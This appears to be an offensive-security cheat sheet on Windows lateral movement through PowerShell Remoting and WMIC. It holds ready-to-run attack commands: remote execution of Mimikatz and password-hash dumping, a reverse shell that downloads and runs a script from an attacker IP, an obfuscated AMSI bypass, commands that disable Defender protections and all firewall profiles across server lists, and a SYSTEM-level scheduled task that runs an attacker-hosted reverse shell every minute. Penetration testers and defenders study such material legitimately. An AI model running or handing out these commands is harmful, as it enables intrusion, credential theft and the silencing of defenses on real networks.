PowerShell Remoting
PowerShell Remoting
Requires Administrative access and target to have WinRM on port 5985 / 5986 to be open
One-to-One
Interactive
Stateful
Executes in a new process (wsmprovhost)
Execute command on multiple systems at once
Runs background jobs
-Credentialparameter can be used to pass credentials
#Enable PowerShell Remoting on local system (Requires elevated privileges)
Enable-PSRemoting
# Create new PSSession
New-PSSession -Computer Srv01.Security.local
# Connect to PSSession
Enter-PSSession -Computer Srv01.Security.local
# Store session as variable
$Session = New-PSSession -Computer Srv01.Security.localIf you have sessions stored as variables then commands with the -Computername parameter can be replaced with -Session $session.
Invoke-Command -Computername Srv01.Security.local -ScriptBlock {Whoami;Hostname}
Invoke-Command -Computername Srv01.Security.local -FilePath 'C:\Tools\Invoke-Mimikatz.ps1'
# Run locally loaded functions on target system
Invoke-Command -Computername Srv01.Security.local -ScriptBlock ${Function:Test-Function}
# Load script into remote session
Invoke-Command -FilePath 'C:\Tools\Invoke-Mimikatz.ps1' -Session $Session
# Reverse shell
Invoke-Command -ComputerName Srv01.Security.local -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://<IP>/Shell.ps1')"}
#Bypass AMSI
Invoke-Command -session $Session -scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )}Multiple Systems
# Execute commands on multiple systems
Invoke-Command –Scriptblock {Get-Process} -ComputerName (Get-Content c:\Serverlist.txt)
# Execute scripts on multiple systems
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content c:\Serverlist.txt)
# Execute functions on multiple systems
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content c:\Serverlist.txt)
# Bypass AMSI on multiple systems
Invoke-Command -Scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )} -ComputerName (Get-Content c:\Serverlist.txt)Disabling Defenses
# Turns off Defender, sets an exclusion path
Invoke-Command -ComputerName Srv02.Security.local -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true;`
Set-MpPreference -DisableIOAVProtection $true;`
Set-MPPreference -DisableBehaviorMonitoring $true;`
Set-MPPreference -DisableBlockAtFirstSeen $true;`
Set-MPPreference -DisableEmailScanning $true;`
Set-MPPReference -DisableScriptScanning $true;`
Set-MpPreference -DisableIOAVProtection $true;`
Add-MpPreference -ExclusionPath "C:\Windows\Temp";`}# Turns off all firewall profiles
Invoke-Command -ComputerName Srv02.Security.local -ScriptBlock {Set-NetFirewallProfile -Profile "Domain","Public","Private" -Enabled "False"}# Turns off Defender and Firewall on multiple systems
Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true;`
Set-MpPreference -DisableIOAVProtection $true;`
Set-MPPreference -DisableBehaviorMonitoring $true;`
Set-MPPreference -DisableBlockAtFirstSeen $true;`
Set-MPPreference -DisableEmailScanning $true;`
Set-MPPReference -DisableScriptScanning $true;`
Set-MpPreference -DisableIOAVProtection $true;`
Add-MpPreference -ExclusionPath "C:\Windows\Temp";`
Set-NetFirewallProfile -Profile "Domain","Public","Private" -Enabled "False"}`
-ComputerName (Get-Content c:\Serverlist.txt)WMIC
Executing calc.exe on remote system
wmic /node:10.10.10.5 /user:moe process call create "cmd.exe /c calc.exe"Executing reverse shell on remote system from a SMB share hosted on attackers system
wmic /node:10.10.10.5 /user:moe process call create "cmd.exe /c \\10.10.10.200\Share\reverse.exe"Setting up persistence with schtasks on a remote system to execute a reverse shell every minute/
wmic /node:10.10.10.5 /user:moe process call create "schtasks /create /sc minute /mo 1 /tn "Persistence" /tr \\10.10.10.200\Share\reverse.exe /ru "SYSTEM""Last updated
Was this helpful?